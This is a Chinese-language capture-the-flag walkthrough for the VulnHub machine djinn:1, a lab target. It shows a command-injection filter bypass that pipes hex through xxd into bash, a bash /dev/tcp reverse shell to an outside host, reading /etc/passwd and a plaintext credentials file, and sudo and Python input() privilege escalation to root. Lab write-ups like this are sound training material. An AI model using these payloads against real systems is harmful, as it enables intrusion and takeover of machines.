Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7
靶场地址:djinn: 1
靶场介绍:
- Level: Beginner-Intermediate
- flags: user.txt and root.txt
- Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
虚拟机安装完成之后,界面如下
扫描一下端口,开放了21,1337,7331端口
ftp端口支持匿名登录
web端口看了一下,没什么普通漏洞
先去ftp上面看下有什么特别到东西
获取了一些信息,nitu:81299和用户名nitish,由于没有ssh端口,先放着
1337端口telnet一下,发现是个数学游戏
写了一个python的小程序
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# 测试中文
import logging
import telnetlib
import time
class TelnetClient():
def __init__(self,):
self.tn = telnetlib.Telnet()
def login_host(self,host_ip,host_port):
try:
self.tn.open(host_ip,port=host_port)
except:
logging.warning('%s网络连接失败'%host_ip)
return False
loop = 0
while loop < 1010:
loop = loop + 1
time.sleep(0.1)
command_result = self.tn.read_very_eager().decode('ascii')
print(command_result)
#q = get_str_btw(command_result, "(", ")")
start = command_result.rindex('(')+1
end = command_result.rindex(')')
q = command_result[start:end]
print(q)
arr = q.split(", ")
a1 = int(arr[0])
a2 = int(arr[2])
print(int(arr[0]))
print(arr[1])
print(int(arr[2]))
retval = ""
if arr[1] == "'+'":
retval = (str(a1+a2))
if arr[1] == "'-'":
retval = (str(a1-a2))
if arr[1] == "'*'":
retval = (str(a1*a2))
if arr[1] == "'/'":
if isinstance(a1/a2, int):
retval = (str(a1/a2))
else:
retval = (str(a1)+"/"+str(a2))
print(retval)
self.tn.write(retval.encode('ascii') + b'\n')
if __name__ == '__main__':
host_ip = '192.168.92.175'
port = 1337
telnet_client = TelnetClient()
telnet_client.login_host(host_ip,port)
算出来的结果,大家可以自己去试试
继续看下7331的web端口
扫描一下文件和目录
只有两个页面,看了一下,wish页面是个shell执行,genie是展示结果的页面
用burp做了一下bypass,我这边采用的是xxd可以用,大家可以尝试一下其他的bypass
过滤了下面这些字符:. * / $ ?
POST /wish HTTP/1.1
Host: 192.168.31.166:7331
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.166:7331/wish
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: close
Upgrade-Insecure-Requests: 1
cmd=echo "0x636174202f6574632f706173737764"|xxd -r -p|bash
测试了一下xxd执行没有问题,那就直接上反弹shell,bash -i >& /dev/tcp/192.168.31.198/1234 0>&1
执行完毕之后,meterpreter上得到反弹连接
由于之前不同的机器上测试,我这边换了地址,大家将就着看
查看一下/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing+List+Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats+Bug-Reporting+System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd+Network+Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd+Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp+daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash
发现两个用户sam和nitish
先看下提权的S位文件
发现nitish目录下面又一个可文件creds.txt
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
获得了用户名密码,因为没有ssh端口,所以我们su nitish提权
aaa@qq.com:/opt/80$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
aaa@qq.com:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
aaa@qq.com:/opt/80$ cd /home
cd /home
aaa@qq.com:/home$ ls
ls
nitish sam
aaa@qq.com:/home$ cd nitish
cd nitish
aaa@qq.com:~$ ls -l
ls -l
total 4
-rw-r----- 1 nitish nitish 33 Nov 12 17:29 user.txt
aaa@qq.com:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
aaa@qq.com:~$
提权之后在用户目录获得user.txt文件,拿到第一个flag
根据之前S位发现的一个特殊文件/usr/bin/genie,这个文件可以直接执行
sudo -u sam genie -cmd whoami
提升到sam用户,sudo -l 一下看看有什么发现
aaa@qq.com:/home/sam$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
aaa@qq.com:/home/sam$ sudo -u root /root/lago
有个程序可以执行lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:
是个小程序,没有什么特别的东西发现
接着在sam用户下找一下文件
发现一个.pyc文件 ,拉下来做下反编译
#!/usr/bin/env python
# encoding: utf-8
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
根据程序分析,可以发现有获得bash的地方
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# ls -la /root/
ls -la /root/
total 64
drwx------ 5 root root 4096 Nov 18 13:06 .
drwxr-xr-x 23 root root 4096 Nov 11 18:50 ..
-rw------- 1 root root 23351 Nov 18 13:06 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 3 root root 4096 Oct 21 19:40 .cache
drwx------ 3 root root 4096 Oct 21 19:40 .gnupg
-rwxr-xr-x 1 root root 1827 Nov 14 20:57 lago
drwxr-xr-x 3 root root 4096 Oct 20 23:50 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 457 Nov 12 21:24 proof.sh
# sh /root/proof.sh
sh /root/proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /home/sam
Date: Fri Dec 13 20:32:01 IST 2019
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
#
提权到root,然后执行sh proof.sh 获得第二个flag。大功告成!
总结
1、在ftp和1337端口花了很长时间,最后发现获得到信息都是迷雾蛋
2、shell bypass这里学到了不少东西